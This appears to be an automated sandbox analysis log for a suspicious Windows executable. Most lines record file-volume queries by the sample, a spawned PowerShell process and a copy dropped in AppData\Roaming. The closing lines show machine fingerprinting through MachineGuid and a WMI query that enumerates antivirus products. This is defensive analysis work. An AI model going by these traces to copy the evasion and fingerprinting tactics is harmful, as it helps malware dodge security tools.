Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Users\user\Desktop\nzLoHpgAln.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: nzLoHpgAln.exe, 00000008.00000002.1876390947.000000000667F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
